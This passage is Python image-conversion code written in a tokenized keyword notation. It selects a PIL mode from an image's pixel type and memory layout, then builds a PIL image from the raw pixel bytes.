"""<if_stmt>img.pixel_type()<eq>img.PIXEL_UNSIGNED<and>img.pixel_num_bytes()<eq>1<block_start><if_stmt>img.depth()<eq>3<and>img.d_step()<eq>1<and>img.w_step()<eq>3<block_start><return>"RGB"<block_end><elif_stmt>img.depth()<eq>4<and>img.d_step()<eq>1<and>img.w_step()<eq>4<block_start><return>"RGBA"<block_end><elif_stmt>img.depth()<eq>1<and>img.w_step()<eq>1<block_start><return>"L"<block_end><block_end><elif_stmt>img.depth()<eq>1<and>img.w_step()<eq>1<block_start><if_stmt>img.pixel_type()<eq>img.PIXEL_BOOL<and>img.pixel_num_bytes()<eq>1<block_start><return>"1"<block_end><elif_stmt>img.pixel_type()<eq>img.PIXEL_SIGNED<and>img.pixel_num_bytes()<eq>4<block_start><return>"I"<block_end><elif_stmt>img.pixel_type()<eq>img.PIXEL_FLOAT<and>img.pixel_num_bytes()<eq>4<block_start><return>"F"<block_end><block_end><return><none><block_end>mode=pil_mode_from_image(img)<if_stmt><not>mode# make a copy of this image using contiguous memory with interleaved channels <block_start>new_img=Image(img.width() img.height() img.depth() <true> img.pixel_type() img.pixel_num_bytes())<line_sep>new_img.copy_from(img)<line_sep>img=new_img<line_sep>mode=pil_mode_from_image(img)<block_end><if_stmt><not>mode<block_start><raise>RuntimeError("Unsupported image format.")<block_end># get buffer from image <if_stmt>six.PY2<block_start>img_pixels=buffer(bytearray(img))<block_end><else_stmt><block_start>img_pixels=memoryview(bytearray(img)).tobytes()<block_end>pil_img=_pil_image_from_bytes(mode (img.width() img.height()) img_pixels "raw" mode img.h_step()<times>img.pixel_num_bytes() 1)<line_sep><return>pil_img<block_end>